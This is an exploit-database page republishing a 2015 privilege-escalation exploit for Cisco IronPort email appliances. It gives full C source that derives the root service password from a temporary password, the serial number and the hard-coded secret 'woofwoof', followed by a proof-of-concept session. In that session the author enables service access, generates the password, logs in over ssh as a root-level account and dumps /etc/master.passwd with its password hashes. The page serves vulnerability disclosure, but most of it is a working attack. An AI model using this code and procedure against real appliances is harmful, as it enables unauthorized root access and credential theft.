Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Cisco Ironport Appliances Privilege Escalation Exploit

🗓️ 24 Jan 2015 00:00:00Reported by Glafkos CharalambousType 
zdt
 zdt🔗 0day.today👁 32 Views

Cisco Ironport Appliances privilege escalation vulnerability fi

Code
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include "md5.h"
#include "getopt.h"

#define MAX_BUFFER 128
#define SECRET_PASS "woofwoof"

void usage(char *name);
void to_lower(char *str);
void fuzz_string(char *str);

int main(int argc, char *argv[]) {
if (argc < 2) { usage(argv[0]); }
int opt;
int index;
char *temp_pass = { 0 };
char *serial_no = { 0 };
char *secret_pass = SECRET_PASS;
char service[MAX_BUFFER] = { 0 };
unsigned char digest[16] = { 0 };
while ((opt = getopt(argc, argv, "p:s:h")) != -1) {
switch (opt)
{
case 'p':
temp_pass = optarg;
break;
case 's':
serial_no = optarg;
break;
case 'h': usage(argv[0]);
break;
default:
printf_s("Wrong Argument: %s\n", argv[1]);
break;
}
}

for (index = optind; index < argc; index++) {
usage(argv[0]);
exit(0);
}

if (temp_pass == NULL || serial_no == NULL) {
usage(argv[0]);
exit(0);
}

if ((strlen(temp_pass) <= sizeof(service)) && (strlen(serial_no) <= sizeof(service))) {
to_lower(serial_no);
fuzz_string(temp_pass);
strcpy_s(service, sizeof(service), temp_pass);
strcat_s(service, sizeof(service), serial_no);
strcat_s(service, sizeof(service), secret_pass);

MD5_CTX context;
MD5_Init(&context);
MD5_Update(&context, service, strlen(service));
MD5_Final(digest, &context);
printf_s("Service Password: ");
for (int i = 0; i < sizeof(digest)-12; i++)
printf("%02x", digest[i]);
}

return 0;
}

void fuzz_string(char *str) {
while (*str){
switch (*str) {
case '1': *str = 'i'; break;
case '0': *str = 'o'; break;
case '_': *str = '-'; break;
}
str++;
}
}

void to_lower(char *str) {
while (*str) {
if (*str >= 'A' && *str <= 'Z') {
*str += 0x20;
}
str++;
}
}

void usage(char *name) {
printf_s("\nUsage: %s -p password -s serial\n", name);
printf_s(" -p <password> | Cisco Service Temp Password\n");
printf_s(" -s <serial> | Cisco Serial Number\n");
printf_s(" -h | This Help Menu\n");
printf_s("\n Example: %s -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019F508A4\n", name);
exit(0);
}



PoC:

Enable Service Account
----------------------
[email protected]:~# ssh -lenablediag 192.168.0.158
Password:
Last login: Sat Jan 24 15:47:07 2015 from 192.168.0.163
Copyright (c) 2001-2013, Cisco Systems, Inc.


AsyncOS 8.5.5 for Cisco C100V build 280

Welcome to the Cisco C100V Email Security Virtual Appliance

Available Commands:
help -- View this text.
quit -- Log out.
service -- Enable or disable access to the service system.
network -- Perform emergency configuration of the diagnostic network interface.
clearnet -- Resets configuration of the diagnostic network interface.
ssh -- Configure emergency SSH daemon on the diagnostic network interface.
clearssh -- Stop emergency SSH daemon on the diagnostic network interface.
tunnel -- Start up tech support tunnel to IronPort.
print -- Print status of the diagnostic network interface.
reboot -- Reboot the appliance.

S/N 564DDFABBD0AD5F7A2E5-2C6019F508A4
Service Access currently disabled.
ironport.example.com> service

Service Access is currently disabled. Enabling this system will allow an
IronPort Customer Support representative to remotely access your system
to assist you in solving your technical issues. Are you sure you want
to do this? [Y/N]> Y

Enter a temporary password for customer support to use. This password may
not be the same as your admin password. This password will not be able
to be used to directly access your system.
[]> cisco123

Service access has been ENABLED. Please provide your temporary password
to your IronPort Customer Support representative.

S/N 564DDFABBD0AD5F7A2E5-2C6019F508A4
Service Access currently ENABLED (0 current service logins)
ironport.example.com>


Generate Service Account Password
---------------------------------
Y:\Vulnerabilities\cisco\ironport>woofwoof.exe

Usage: woofwoof.exe -p password -s serial
-p <password> | Cisco Service Temp Password
-s <serial> | Cisco Serial Number
-h | This Help Menu

Example: woofwoof.exe -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019F508A4

Y:\Vulnerabilities\cisco\ironport>woofwoof.exe -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019
F508A4
Service Password: b213c9a4


Login to the appliance as Service account with root privileges
--------------------------------------------------------------
[email protected]:~# ssh -lservice 192.168.0.158
Password:
Last login: Wed Dec 17 21:15:24 2014 from 192.168.0.10
Copyright (c) 2001-2013, Cisco Systems, Inc.


AsyncOS 8.5.5 for Cisco C100V build 280

Welcome to the Cisco C100V Email Security Virtual Appliance
# uname -a
FreeBSD ironport.example.com 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Fri Mar 14 08:04:05 PDT 2014
[email protected]:/usr/build/iproot/freebsd/mods/src/sys/amd64/compile/MESSAGING_GATEWAY.amd64 amd64

# cat /etc/master.passwd
# $Header: //prod/phoebe-8-5-5-br/sam/freebsd/install/dist/etc/master.passwd#1 $
root:*:0:0::0:0:Mr &:/root:/sbin/nologin
service:$1$bYeV53ke$Q7hVZA5heeb4fC1DN9dsK/:0:0::0:0:Mr &:/root:/bin/sh
enablediag:$1$VvOyFxKd$OF2Cs/W0ZTWuGTtMvT5zc/:999:999::0:0:Administrator support access
control:/root:/data/bin/enablediag.sh
adminpassword:$1$aDeitl0/$BlmzKUSeRXoc4kcuGzuSP/:0:1000::0:0:Administrator Password
Tool:/data/home/admin:/data/bin/adminpassword.sh
daemon:*:1:1::0:0:Owner of many system processes:/root:/sbin/nologin
operator:*:2:5::0:0:System &:/:/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source,,,:/:/sbin/nologin
tty:*:4:65533::0:0:Tty Sandbox:/:/sbin/nologin
kmem:*:5:65533::0:0:KMem Sandbox:/:/sbin/nologin
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/sbin/nologin
sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/sbin/nologin
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/sbin/nologin
support:$1$FgFVb064$SmsZv/ez7Pf4wJLp5830s/:666:666::0:0:Mr &:/root:/sbin/nologin
admin:$1$VvOyFxKd$OF2Cs/W0ZTWuGTtMvT5zc/:1000:1000::0:0:Administrator:/data/home/admin:/data/bin/cli.sh
clustercomm:*:900:1005::0:0:Cluster Communication User:/data/home/clustercomm:/data/bin/command_proxy.sh
smaduser:*:901:1007::0:0:Smad User:/data/home/smaduser:/data/bin/cli.sh
spamd:*:783:1006::0:0:CASE User:/usr/case:/sbin/nologin
pgsql:*:70:70::0:0:PostgreSQL pseudo-user:/usr/local/pgsql:/bin/sh
ldap:*:389:389::0:0:OpenLDAP Server:/nonexistent:/sbin/nologin

*/

#  0day.today [2018-04-08]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
24 Jan 2015 00:00Current
7.2High risk
Vulners AI Score7.2
cisco ironportprivileged escalationauthenticationvulnerabilitysecurity hardeningpassword generationtechnical supportalgorithm implementationroot accesscompromised credentialsdefault passwordtemporary passwordserial numberremote access.
32